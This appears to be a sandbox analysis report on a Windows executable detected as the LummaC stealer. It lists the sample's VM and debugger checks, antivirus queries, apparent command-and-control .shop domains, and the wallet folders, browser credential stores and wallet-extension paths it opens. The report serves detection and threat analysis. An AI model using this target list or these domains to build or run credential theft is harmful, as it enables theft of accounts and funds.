Source: C:\Users\user\Desktop\VoGtelkHSn.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\VoGtelkHSn.exe TID: 2796	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe TID: 2796	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C23000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: VoGtelkHSn.exe, 00000000.00000003.2058143857.00000000054E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2057403228.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: VoGtelkHSn.exe, 00000000.00000003.2058143857.00000000054E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.4.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Users\user\Desktop\VoGtelkHSn.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\VoGtelkHSn.exe

Code function: 0_2_00433CC0 LdrInitializeThunk,

0_2_00433CC0

Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02BF7A5B push dword ptr fs:[00000030h]	0_2_02BF7A5B
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02EB092B mov eax, dword ptr fs:[00000030h]	0_2_02EB092B
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Code function: 0_2_02EB0D90 mov eax, dword ptr fs:[00000030h]	0_2_02EB0D90

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: VoGtelkHSn.exe	String found in binary or memory: tolerateilusidjukl.shop
Source: VoGtelkHSn.exe	String found in binary or memory: productivelookewr.shop
Source: VoGtelkHSn.exe	String found in binary or memory: strollheavengwu.shop
Source: VoGtelkHSn.exe	String found in binary or memory: demonstationfukewko.shop
Source: VoGtelkHSn.exe	String found in binary or memory: liabilitynighstjsko.shop
Source: VoGtelkHSn.exe	String found in binary or memory: alcojoldwograpciw.shop
Source: VoGtelkHSn.exe	String found in binary or memory: incredibleextedwj.shop
Source: VoGtelkHSn.exe	String found in binary or memory: shortsvelventysjo.shop
Source: VoGtelkHSn.exe	String found in binary or memory: shatterbreathepsw.shop

Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\VoGtelkHSn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: VoGtelkHSn.exe, 00000000.00000003.2104950559.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000002.2299084097.0000000005440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\VoGtelkHSn.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: VoGtelkHSn.exe PID: 5444, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: VoGtelkHSn.exe, 00000000.00000003.2134203398.0000000002CBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: VoGtelkHSn.exe, 00000000.00000003.2134203398.0000000002CBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: VoGtelkHSn.exe, 00000000.00000003.2134203398.0000000002CBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: VoGtelkHSn.exe, 00000000.00000003.2057403228.0000000002C56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\VoGtelkHSn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
